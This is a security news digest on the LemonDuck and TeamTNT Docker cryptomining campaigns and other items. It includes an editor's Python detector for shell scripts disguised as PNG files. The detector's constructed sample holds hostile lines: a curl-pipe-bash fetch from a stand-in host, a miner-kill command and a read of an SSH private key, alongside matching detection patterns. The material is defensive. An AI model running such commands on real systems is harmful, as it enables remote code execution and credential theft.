BleepingComputer reports that LemonDuck botnet operators have launched an ongoing widespread cryptomining campaign targeted at Docker APIs on Linux servers.
CrowdStrike researchers found that, after reaching an exposed Docker API, LemonDuck launches a malicious container that retrieves a Bash script disguised as a PNG image. That script kills competing cryptomining processes and daemons and severs network connections to other mining groups' command-and-control servers, deletes files at known indicator-of-compromise paths, and disables Alibaba Cloud's monitoring service. It then launches the XMRig mining utility with a configuration file that conceals the attacker's wallets, according to the report. LemonDuck also harvests SSH keys from the filesystem to move laterally across affected networks. A separate Cisco Talos report notes that the TeamTNT group is likewise attacking exposed Docker API instances on AWS, mining cryptocurrency while evading detection by disabling cloud security tooling.
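As an added example (editor's code, not code from CrowdStrike, Cisco Talos or the reports above), the following Python check flags a downloaded "image" whose bytes are really a shell script, the spoofing trick described above. It compares the file's leading magic bytes against what its extension promises and scans the head of the file for shell, miner-kill and SSH-key indicators. The indicator list, file names and sample inputs are constructed for illustration and are not taken from the campaign.

```python
"""Flag files whose content does not match their image extension.

Editor's example, not LemonDuck or CrowdStrike artefacts. The indicator
patterns and sample payloads below are constructed for illustration.
"""
import re

# Leading magic bytes for the image types we know how to verify.
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}

# Cheap textual indicators that a blob is a shell script with miner-style
# behaviour (constructed list; tune for your environment).
SHELL_HINTS = [
    ("shebang", re.compile(rb"^#!\s*/(usr/)?bin/(env\s+)?(ba)?sh", re.M)),
    ("process-kill", re.compile(rb"\b(pkill|killall)\b")),
    ("curl-pipe-shell", re.compile(rb"\bcurl\b[^\n]*\|\s*(ba)?sh\b")),
    ("xmrig", re.compile(rb"\bxmrig\b", re.I)),
    ("ssh-key-access", re.compile(rb"\.ssh/(id_rsa|authorized_keys|known_hosts)")),
]


def extension(name):
    """Lower-cased extension including the dot, or '' when there is none."""
    dot = name.rfind(".")
    return name[dot:].lower() if dot != -1 else ""


def classify(name, data):
    """Return a dict describing how the bytes relate to the claimed type.

    verdict values:
      spoofed-image-script   image extension, wrong magic, shell indicators
      extension-mismatch     image extension, wrong magic, no indicators
      image-with-embedded-script  magic is right but shell text is present
      script                 non-image name with shell indicators
      benign-or-unknown      nothing suspicious found
    """
    ext = extension(name)
    magic = MAGIC.get(ext)
    magic_ok = magic is not None and data.startswith(magic)
    head = data[:4096]  # only inspect the start; enough for a dropper
    hits = [label for label, pattern in SHELL_HINTS if pattern.search(head)]

    if magic_ok and hits:
        verdict = "image-with-embedded-script"
    elif magic is not None and not magic_ok and hits:
        verdict = "spoofed-image-script"
    elif magic is not None and not magic_ok:
        verdict = "extension-mismatch"
    elif hits:
        verdict = "script"
    else:
        verdict = "benign-or-unknown"
    return {"ext": ext, "magic_ok": magic_ok, "shell_hits": hits, "verdict": verdict}


# Constructed sample inputs: a minimal PNG header and a fake "image".
REAL_PNG = MAGIC[".png"] + b"\x00" * 32
FAKE_PNG = (
    b"#!/bin/bash\n"
    b"pkill -f xmrig\n"
    b"curl -fsSL http://example.invalid/core.png | bash\n"
    b"cat ~/.ssh/id_rsa\n"
)

if __name__ == "__main__":
    for name, blob in (("logo.png", REAL_PNG), ("core.png", FAKE_PNG)):
        print(name, classify(name, blob))
```

Run it over files written by container processes or fetched by `curl` inside a container; a PNG whose first eight bytes are a shebang is the cheap tell. It is a triage aid only, and no substitute for not exposing the Docker daemon's TCP socket without TLS and client certificates in the first place.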
SiliconAngle reports that growing security alert fatigue has prompted Torq to introduce HyperSOC, a system built on its Hyperautomation Platform that uses artificial intelligence to automate security operations center response, case management and monitoring, with the aim of speeding up threat investigation and remediation.
Moldovan botnet operator Alexander Lefterov, also known as Alipatime, Alipako, and Uptime, has been indicted by the U.S. Department of Justice for his involvement in widespread attacks against U.S.-based computers, BleepingComputer reports.
CyberScoop reports that more than 100 Ukrainian local government and police documents uploaded to VirusTotal in February were found to be infected with the OfflRouter malware, which dates back to 2015 and spreads only through already infected documents and removable media.